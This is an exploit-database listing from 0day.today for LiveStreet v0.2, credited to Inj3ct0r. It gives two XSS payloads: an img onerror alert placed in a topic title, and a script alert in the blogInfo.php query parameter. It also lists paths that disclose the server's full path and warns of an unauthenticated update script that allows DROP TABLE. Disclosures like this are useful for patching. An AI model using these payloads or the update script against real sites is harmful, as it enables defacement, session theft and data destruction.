[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LiveStreet v0.2 Xss Vulnerability

Author
0day Today Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10976
Category
web applications
Date add
19-02-2010
Platform
unsorted
=================================
LiveStreet v0.2 Xss Vulnerability
=================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] Support e-mail  : submit[at]inj3ct0r.com
#[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net


Site: http://livestreet.ru/
Version: LiveStreet 0.2 - 05.11.2008
Download: http://sourceforge.net/projects/livestreet/


Xss Exploit:

- Create a topic, write in the header <img src =. onerror = alert ()>
- Post comment in create topic
- Go to page
- - Live (/comments/), or
- - In your profile> Publications> Comments (/my/your username/comment/)

----------------------------------

Disclosure ways:

/classes/lib/external/Smarty-2.6.19/demo/
/classes/lib/external/Smarty-2.6.19/libs/Smarty_Compiler.class.php
/classes/lib/external/Smarty-2.6.19/unit_test/smarty_unit_test_gui.php
/classes/lib/external/Smarty-2.6.19/unit_test/smarty_unit_test.php
/classes/lib/external/Smarty-2.6.19/unit_test/test_cases.php
/include/function.php
/templates/compiled/*

----------------------------------

Xss Exploit:

/include/ajax/blogInfo.php?asd=<script>alert('www.inj3ct0r.com')</script>

----------------------------------

WARNING!!!

/update/update_0.1.2_to_0.2.php

Available DROP TABLE, etc. without any authorization ...



#  0day.today [2024-12-23]  #